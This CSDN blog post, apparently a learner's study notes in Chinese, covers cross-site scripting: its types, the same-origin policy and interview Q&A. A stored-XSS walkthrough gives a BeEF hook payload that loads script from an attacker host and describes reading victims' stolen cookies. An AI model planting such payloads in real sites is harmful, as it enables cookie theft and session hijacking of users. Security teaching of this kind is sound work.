OWASP TOP 10-跨站脚本(XSS)

已于 2023-11-06 17:13:29 修改
阅读量420 收藏 1
点赞数
分类专栏: 安全笔记 文章标签: xss 网络安全
于 2023-11-06 16:39:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/134249662
版权

文章目录

漏洞原理

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 在XSS攻击中,一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。 由于有的服务器并没有对用户的输入进行安全方面的验证,攻击者就可以很容易地通过正常的输入手段,夹带进一些恶意的HTML脚本代码。当受害者的浏览器访问目标服务器上被注入恶意脚本的页面后,由于它对目标服务器的信任,这段恶意脚本的执行不会受到什么阻碍。而此时,攻击者的目的就已经达到了。

漏洞分类

XSS 分类: 1.反射型 2.存储型 3.DOM型

存储型XSS

XSS (Stored)存储型攻击发生的具体情镜:

黑客发现一个存在XSS漏洞的接口或页面,构造恶意代码(payload)后,将其插入到页面中使得所有浏览该页面的用户均受到安全威胁。payload : <script>alert(1)</script>

下面我们使用beef XSS配合完成攻击。 这里我们将payload插入页面后,当用户浏览了这个页面,<script>标签就会远程执行我们的beef上面的恶意js代码从而盗取cookie。 启动BEEF方法如下: 第一步,点击左侧终端后输入 beef-xss 第二步,等待打开Web界面,输入帐户密码。密码及账户均为 beef

开启正式的攻击测试: 插入的payload为:

<script src="http://192.168.0.150:3000/hook.js"></script>

其中172.16.11.2为beef工具所在的主机IP,根据实际情况给予修改即可。另Linux查看本机IP地址的命令为:ifconfig 之后我们先刷新一下页面,确保我们插入的代码执行。 再进入之前打开的BEEF界面,查询我们收到的cookie: 进入BEEF后我们先点击 Command Browser -> Commands -> 在Searche框输入cookie并回车 -> 进入新的页面后点击右下角Execute ->之后点击中间出现的记录 此时我们就可以在右侧看到我们收到的cookie了。 完成全部操作后我们将得到一个格式为: php=xxxxxxxxxx;security=low样式的cookie。

反射型XSS

那么到此可能会产生一个问题,如果攻击者能诱使其他用户访问他构造的URL,从而攻击用户浏览器盗取cookie。那么他为什么还有费大力气在一个正常的网站挖掘XSS漏洞,然后再加以利用。如果他在自己的网站上编写脚本并引诱用户点击不是更加便利么?

这里就要介绍一下同源策略的概念。

同源策略是浏览器实施的一种关键机制,主要用于防止不同来源内容相互干扰。

其保障了,在用户浏览器打开多个站点(源)时,一个站点(源)可以其自身(同源)从收到内容,并可以读取和修改,但不能从其他其他站点收到内容。

当没有同源策略时,如果某个不知情的用户浏览到恶意网站,该网站上运行的脚本代码将在能够访问这名用户与该网站交互信息的同时,访问到该用户浏览器上打开的其他网站上的任何数据和功能。这样恶意网站几乎可以为所欲为,比如上文的盗用cookie行为,就可以使攻击者冒用用户身份进行操作。

因此,设计同源策略就是为了避免不同域在用户浏览器中彼此干扰,浏览器对不同来源(域)收到的内容进行隔离。这也回答了为什么攻击者要利用网站的XSS漏洞来构造钓鱼连接,攻击者的目的不是单纯的执行脚本,而是盗取用户在存在XSS漏洞的网站上的cookie。

面试问题

6.1 简单说一下xss攻击吧

xss攻击中文全称叫做跨站脚本攻击 , 是一种客户端攻击 , 受害者往往是用户 , 但是网站管理员也是用户
, 所以xss也可以算是一种服务端攻击 , 最常用的代码是javascript语言

6.2 形成xss攻击的原理

web程序没有对用户的输入做严格的过滤和限制 , 对输出没有进行html实体编码

6.3 xss的危害

获取用户的cookie信息
键盘记录
网络钓鱼,包括盗取各类用户账号
网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等
进行大量的客户端攻击,如DDoS攻击
可以结合其他漏洞,如CSRF漏洞 , 打组合拳
总之js能做的事 , xss攻击都能实现

6.4 xss的分类

  1. 反射型 用户输入的数据直接反射给浏览器 , 一次性的 , 所见即所得
  2. 存储型 用户输入的数据会存储在数据库中 , 永久保存 , 具有很强的稳定性
  3. dom型 攻击的payload是修改了受害者浏览器页面的DOM树而触发的 , 因为一旦dom树被修
    改 , 浏览器就会重新渲染页面 , 触发xss攻击

6.4 xss可能存在的地方

html标签中
标签的属性中
style样式中
javascript代码中

6.5 你了解什么是同源策略吗

同源策略是指 : 禁止页面加载或执行与自身来源不同的域的任何脚本
当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 , 但是部分标签是不受同源策
略的影响

<script src="..."> //加载本地js执行
<img src="..."> //图片
<link href="..."> //css
<iframe src="..."> //iframe框架标签
sec0nd_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OWASP Top 10 2017-en-ch.rar
12-06
OWASP Top 10 2017 中文-英文 版本。 总结 一、注入(常见sql注入) 二、失效的身份认证 ...七、脚本攻击(XSS) 八、不安全的反序列化 九、使用含有已知漏洞的组件 十、不足的日志记录和监控
XSS - 脚本攻击
m0_50818626的博客
05-26 1236
存储型XSS又被称为持久性XSS,存储型XSS是最危险的一种脚本。允许用户存储数据的WEB应用程序都可能会出现存储型XSS漏洞,当攻击者提交一段XSS代码后,被服务器端接收并存储,当再次访问页面时,这段XSS代码被程序读取响应给浏览器,造成XSS攻击,这就是存储型XSS。在测试是否存在XSS时,首先要确定输入点与输出点,例如:我们要在留言内容上测试XSS漏洞,首先就要去寻找留言内容输出(显示)的地方是在标签内还是标签属性内,或者在其他地方,如果输出的数据在属性内,那么XSS是不会被执行的。
OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS)
weixin_43125873的博客
08-15 248
OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS) 文章目录OWASP TOP10系列之#TOP7# A7-Cross-Site Scripting (XSS)前言一、XSS是什么?二、如何防御总结 前言 Cross-Site Scripting (XSS) 即脚本攻击,XSSOWASP Top 10 中第二个最普遍的问题,在所有应用程序的大约三分之二中都存在。 一、XSS是什么? 反射型 (Reflected )XSS:应用程序或 API
OWASP脚本xss基础技能
wutiangui的博客
06-12 1374
简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOM型xss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOM型xss也可以理解为反射性xss。使别的用户访问都会执行相应的嵌入代码。攻击者将已经构造完成的恶意页面发送给用户,用户访问看似正常的页面后收到攻击,这类XSS通常无法直接在URL中看到恶意代码,具有较强的持久性和隐蔽性。
OWASP Cross-Site Scripting (XSS) 思路笔记
isinstance的博客
02-17 1979
本此实践的WebGoat版本如下所示Phishing with XSSLesson Plan Title: Phishing with XSS(网络钓鱼与 XSS)这个看题目就知道要我们做什么了,主要就算通过XSS来让受害者输入自己的邮箱和密码来达到钓鱼的结果It is always a good practice to validate all input on the server side.
OWASP Top 10阅读笔记
09-01
* A3 – 脚本XSS):当应用程序收到含有不可信的数据,在没有进行适当的验证和转义的情况下,就将它发送给一个网页浏览器。 * A4 – 失效的访问控制:攻击者可能会通过应用程序中许多不同的路径方法去危害您的...
OWASP Top 10 2017 v1.3中文最新版.pdf
08-25
7. **A7:2017 - 脚本XSS)**:攻击者通过注入恶意脚本到网页,从而可以劫持用户会话、窃取数据。 8. **A8:2017 - 不安全的反序列化**:反序列化过程中的漏洞可能导致远程代码执行,使攻击者控制受影响的应用...
OWASP top 10 2017
11-09
A2-脚本XSS) A3-错误的认证和会话管理 A4-不安全的直接对象引用 A5-伪造请求(CSRF) – Cross-Site Request Forgery A7-限制远程访问失败 A8-未验证的重定向和传递 A9-不安全的加密存储 A10-不足...
OWASP TOP 10的介绍和应用
04-20
OWASP Top 10包括:注入、失效身份验证和会话管理、敏感信息泄露、XML外部实体注入攻击(XXE)、存取控制中断、安全性错误配置、脚本攻击(XSS)、不安全的反序列化、使用具有已知漏洞的组件、日志记录和监控...
XSS 安全漏洞介绍及修复方案
墨鸦的博客
06-25 4087
XSS 安全漏洞介绍及修复方案
常见漏洞之XSS
weixin_54799594的博客
06-27 886
学习网络安全过程中的一些小笔记
5.XSS-反射型(post)利用:获取cookie
愿听风成曲
06-23 243
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常网去访问。基于IP地址配置文件。
响应头缺省xss防御头(X-XSS-Protection、X-Content-Type-Options)
墨痕诉清风的博客
06-28 66
Web对于 HTTP 请求的响应头缺少 X-Content-Type-Options,这意味着此网更易遭受脚本攻击(XSS)。X-Content-Type-Options 响应头相当于一个提示标志,被服务器用来提示客户端一定要遵循在 Content-Type 首部中对 MIME 类型 的设定,而不能对其进行修改,这就禁用了客户端的 MIME 类型嗅探行为。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8304
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
服务器虚拟化部署方案.doc
06-29
服务器、电脑、
北京市东城区人民法院服务器项目.doc
06-29
服务器、电脑、
求集合数据的均方差iction-mast开发笔记
06-29
求集合数据的均方差
Wom6.3Wom6.3Wom6.3
06-29
Wom6.3Wom6.3Wom6.3
html网页版python语言pytorch框架的图像分类西瓜是否腐烂识别-含逐行注释和说明文档-不含图片数据集
最新发布
06-29
本代码是基于python pytorch环境安装的cnn深度学习代码。 下载本代码后,有个环境安装的requirement.txt文本 运行环境推荐安装anaconda,然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本。 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,会自动读取txt文本内的内容进行训练 运行03html_server.py,生成网页的url了 打开
owasp top10
03-27
2. 脚本(Cross-Site Scripting,XSS):攻击者通过在Web应用程序中插入恶意脚本来窃取用户信息或篡改网页内容。 3. 不安全的身份验证(Broken Authentication):指的是应用程序在用户身份验证和会话管理方面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值